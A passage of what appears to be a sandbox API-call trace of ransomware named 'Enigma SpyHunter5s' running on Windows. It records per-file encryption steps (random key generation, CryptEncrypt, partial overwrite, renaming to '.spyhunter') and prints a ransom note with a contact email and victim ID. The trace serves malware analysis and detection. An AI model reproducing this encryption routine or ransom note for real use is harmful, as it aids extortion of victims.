dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.636] GetProcessHeap () returned 0x2c0000 [0145.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.636] GetProcessHeap () returned 0x2c0000 [0145.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe208 | out: hHeap=0x2c0000) returned 1 [0145.636] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee78 | out: pbBuffer=0x270ee78) returned 1 [0145.636] GetProcessHeap () returned 0x2c0000 [0145.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.636] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee70*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee70*=0x30) returned 1 [0145.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.666] GetProcessHeap () returned 0x2c0000 [0145.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.666] GetProcessHeap () returned 0x2c0000 [0145.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efde28 | out: hHeap=0x2c0000) returned 1 [0145.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.667] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.667] WriteFile (in: hFile=0xa0, lpBuffer=0x270edab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eed4, lpOverlapped=0x0 | out: lpBuffer=0x270edab*, lpNumberOfBytesWritten=0x270eed4*=0x127, lpOverlapped=0x0) returned 1 [0145.668] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.668] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eed4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eed4*=0x2ac, lpOverlapped=0x0) returned 1 [0145.668] CloseHandle (hObject=0xa0) returned 1 [0145.668] GetProcessHeap () returned 0x2c0000 [0145.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2effd38 | out: hHeap=0x2c0000) returned 1 [0145.668] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee70 | out: pbBuffer=0x270ee70) returned 1 [0145.668] GetProcessHeap () returned 0x2c0000 [0145.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.668] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee68*=0x30) returned 1 [0145.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.669] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 81 [0145.669] StrStrW (lpFirst="cache.dat", lpSrch=".txt") returned 0x0 [0145.669] GetProcessHeap () returned 0x2c0000 [0145.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0145.669] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.688] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.688] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.688] GetProcessHeap () returned 0x2c0000 [0145.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0145.688] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.688] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee2c, lpOverlapped=0x0 | out: lpBuffer=0x270ee6c*, lpNumberOfBytesWritten=0x270ee2c*=0x4, lpOverlapped=0x0) returned 1 [0145.706] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee2c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee2c*=0x30, lpOverlapped=0x0) returned 1 [0145.706] CloseHandle (hObject=0xa0) returned 1 [0145.706] GetProcessHeap () returned 0x2c0000 [0145.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.707] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.spyhunter") returned 91 [0145.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.spyhunter")) returned 1 [0145.729] GetProcessHeap () returned 0x2c0000 [0145.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.729] GetProcessHeap () returned 0x2c0000 [0145.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.729] GetProcessHeap () returned 0x2c0000 [0145.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65028 | out: hHeap=0x2c0000) returned 1 [0145.729] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee70 | out: pbBuffer=0x270ee70) returned 1 [0145.729] GetProcessHeap () returned 0x2c0000 [0145.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.729] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee68*=0x30) returned 1 [0145.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.730] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 77 [0145.730] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0145.730] GetProcessHeap () returned 0x2c0000 [0145.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.730] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ee2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.751] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.752] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ee2c*=0x2800, lpOverlapped=0x0) returned 1 [0145.752] GetProcessHeap () returned 0x2c0000 [0145.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.752] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.752] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee2c, lpOverlapped=0x0 | out: lpBuffer=0x270ee6c*, lpNumberOfBytesWritten=0x270ee2c*=0x4, lpOverlapped=0x0) returned 1 [0145.850] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee2c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee2c*=0x30, lpOverlapped=0x0) returned 1 [0145.850] CloseHandle (hObject=0xa0) returned 1 [0145.850] GetProcessHeap () returned 0x2c0000 [0145.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.850] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.spyhunter") returned 87 [0145.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll.spyhunter")) returned 1 [0145.851] GetProcessHeap () returned 0x2c0000 [0145.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.851] GetProcessHeap () returned 0x2c0000 [0145.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.851] GetProcessHeap () returned 0x2c0000 [0145.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31488 | out: hHeap=0x2c0000) returned 1 [0145.851] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee68 | out: pbBuffer=0x270ee68) returned 1 [0145.851] GetProcessHeap () returned 0x2c0000 [0145.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.852] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee60*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee60*=0x30) returned 1 [0145.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.852] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 75 [0145.852] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0145.852] GetProcessHeap () returned 0x2c0000 [0145.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0145.852] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ee24*=0x2800, lpOverlapped=0x0) returned 1 [0145.918] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.918] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ee24*=0x2800, lpOverlapped=0x0) returned 1 [0145.918] GetProcessHeap () returned 0x2c0000 [0145.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0145.918] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.918] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee24, lpOverlapped=0x0 | out: lpBuffer=0x270ee64*, lpNumberOfBytesWritten=0x270ee24*=0x4, lpOverlapped=0x0) returned 1 [0146.060] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee24, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee24*=0x30, lpOverlapped=0x0) returned 1 [0146.061] CloseHandle (hObject=0xa0) returned 1 [0146.061] GetProcessHeap () returned 0x2c0000 [0146.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.061] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.spyhunter") returned 85 [0146.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll.spyhunter")) returned 1 [0146.061] GetProcessHeap () returned 0x2c0000 [0146.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.061] GetProcessHeap () returned 0x2c0000 [0146.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.062] GetProcessHeap () returned 0x2c0000 [0146.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6868 | out: hHeap=0x2c0000) returned 1 [0146.062] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee68 | out: pbBuffer=0x270ee68) returned 1 [0146.062] GetProcessHeap () returned 0x2c0000 [0146.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.062] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee60*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee60*=0x30) returned 1 [0146.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.063] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 77 [0146.063] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0146.063] GetProcessHeap () returned 0x2c0000 [0146.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.063] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee24*=0x2800, lpOverlapped=0x0) returned 1 [0146.107] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.107] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee24*=0x2800, lpOverlapped=0x0) returned 1 [0146.108] GetProcessHeap () returned 0x2c0000 [0146.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.108] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.108] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee24, lpOverlapped=0x0 | out: lpBuffer=0x270ee64*, lpNumberOfBytesWritten=0x270ee24*=0x4, lpOverlapped=0x0) returned 1 [0146.115] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee24, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee24*=0x30, lpOverlapped=0x0) returned 1 [0146.116] CloseHandle (hObject=0xa0) returned 1 [0146.116] GetProcessHeap () returned 0x2c0000 [0146.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.116] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.spyhunter") returned 87 [0146.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll.spyhunter")) returned 1 [0146.117] GetProcessHeap () returned 0x2c0000 [0146.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.117] GetProcessHeap () returned 0x2c0000 [0146.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.117] GetProcessHeap () returned 0x2c0000 [0146.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30f18 | out: hHeap=0x2c0000) returned 1 [0146.117] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee60 | out: pbBuffer=0x270ee60) returned 1 [0146.117] GetProcessHeap () returned 0x2c0000 [0146.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.117] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee58*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee58*=0x30) returned 1 [0146.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.121] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 76 [0146.121] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.121] GetProcessHeap () returned 0x2c0000 [0146.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.121] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee1c*=0x2800, lpOverlapped=0x0) returned 1 [0146.132] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.132] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee1c*=0x2800, lpOverlapped=0x0) returned 1 [0146.132] GetProcessHeap () returned 0x2c0000 [0146.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.132] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.133] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee1c, lpOverlapped=0x0 | out: lpBuffer=0x270ee5c*, lpNumberOfBytesWritten=0x270ee1c*=0x4, lpOverlapped=0x0) returned 1 [0146.138] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee1c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee1c*=0x30, lpOverlapped=0x0) returned 1 [0146.138] CloseHandle (hObject=0xa0) returned 1 [0146.138] GetProcessHeap () returned 0x2c0000 [0146.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.139] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.spyhunter") returned 86 [0146.139] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll.spyhunter")) returned 1 [0146.140] GetProcessHeap () returned 0x2c0000 [0146.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.140] GetProcessHeap () returned 0x2c0000 [0146.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0146.140] GetProcessHeap () returned 0x2c0000 [0146.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30d48 | out: hHeap=0x2c0000) returned 1 [0146.140] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee60 | out: pbBuffer=0x270ee60) returned 1 [0146.140] GetProcessHeap () returned 0x2c0000 [0146.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0146.140] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee58*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee58*=0x30) returned 1 [0146.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0146.141] lstrlenW (lpString="\\\\?\\C:\\Users\\All 